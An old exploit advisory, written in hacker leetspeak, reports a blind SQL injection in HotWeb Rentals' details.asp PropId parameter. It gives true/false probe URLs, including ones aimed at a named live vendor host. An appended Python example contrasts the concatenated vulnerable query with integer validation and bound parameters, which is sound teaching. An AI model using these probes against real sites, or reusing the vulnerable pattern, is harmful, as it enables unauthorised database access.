# Title : HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
# Published : 2009-09-15
# Author : R3d-D3v!L
[•] ••••••••••••••••••••••{In the name of God, the Most Gracious, the Most Merciful}••••••••••••••••••••••
[~]
[~] Type: (details.asp PropId) BL!ND SQL Injection Vulnerability
[~]
[~] Vendor: www.hotwebscripts.co.uk
[~]
[~] Software: HotWeb Rentals
[~]
[~] author: ((R3d D3v!L))
[~]
[~] Date: 15.2.2009
[~]
[~] Home: CL053D
[~]
[~] contact: X@hotmail.co.jp
[~]-----------------------{DEV!L'5 of SYST3M}------------------
[~] ERR0R CONSOLE
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
[~] SECURE ALERT FR0M 7h3 R3d-D3V!L
[~] Exploit:
[~] TRU3 : details.asp?PropId=1+and+1=1
[~] FALS3 : details.asp?PropId=1+and+1=2
[~] liv3 3xpL0!T:
[~] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[~] F4L53 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[~]
N073:
R34L R3d-D3V!L WAS h3R3 ((X@Minhal.co.il))
4R48!4N-HACK3R!! The Arab hackers
[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & XP_10 & B0rN 2 K!LL & JUPA & D3V!L-FUCK3R
[~] 70 ALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] special thanks : ((dolly)) & ((7am3m)) & MAGOUSH ;) & EMAD & 0R45h3Y
[~] special SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[~] special FR!ND: 74M3M
[~] !'M 4R48!4N 3XPL0!73R.
[~]
[~]--------------------------------------------------------------------------------
# www.Syue.com [2009-09-15]
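
Added example (not part of the original advisory and not the vendor's code): why the 1=1 and 1=2 values of PropId give different pages when the parameter is concatenated into the query, and how integer validation plus a bound parameter removes that difference. The table name, schema, function names and the use of sqlite3 in place of the application's real database are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the rentals table; the real schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE properties (PropId INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO properties VALUES (1, 'Sample cottage')")
    return conn

def details_vulnerable(conn, prop_id):
    # Pattern behind the finding: the parameter is pasted into the SQL text,
    # so "1 and 1=1" / "1 and 1=2" become part of the WHERE clause.
    sql = "SELECT title FROM properties WHERE PropId = " + prop_id
    return conn.execute(sql).fetchall()

def parse_prop_id(raw):
    # Allow-list: ASCII decimal digits only, bounded length; everything else is rejected.
    s = raw.strip()
    if not (s.isascii() and s.isdigit() and len(s) <= 9):
        raise ValueError("PropId must be a positive integer")
    return int(s)

def details_hardened(conn, raw):
    # Validate first, then bind the value so it is never parsed as SQL.
    try:
        pid = parse_prop_id(raw)
    except ValueError:
        return None  # caller renders one generic error page for every bad value
    return conn.execute(
        "SELECT title FROM properties WHERE PropId = ?", (pid,)
    ).fetchall()

def compare(decoded_values=("1", "1 and 1=1", "1 and 1=2")):
    # Values as the server sees them after URL decoding ("+" becomes a space).
    conn = make_db()
    return {v: (details_vulnerable(conn, v), details_hardened(conn, v))
            for v in decoded_values}

if __name__ == "__main__":
    for value, (vuln, hard) in compare().items():
        print(f"{value!r:14} vulnerable={vuln} hardened={hard}")
```

With the hardened handler both test values produce the same rejection, so the response no longer reveals whether an injected condition evaluated true or false.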